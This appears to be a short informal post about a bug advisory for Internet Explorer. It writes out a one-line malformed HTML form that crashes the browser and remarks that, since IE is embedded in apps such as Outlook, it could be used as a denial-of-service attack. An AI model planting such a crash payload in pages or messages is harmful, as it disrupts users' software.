This is interesting. Create a text file and put the following in it:
<html> <form> <input type crash> </form> </html>
Save it as crash.html and open it in IE. BOOM! How the hell did something like this slip though QA? As the advisory mentions, since IE gets embedded in a number of apps (Outlook particularly), this could be used as a DOS attack.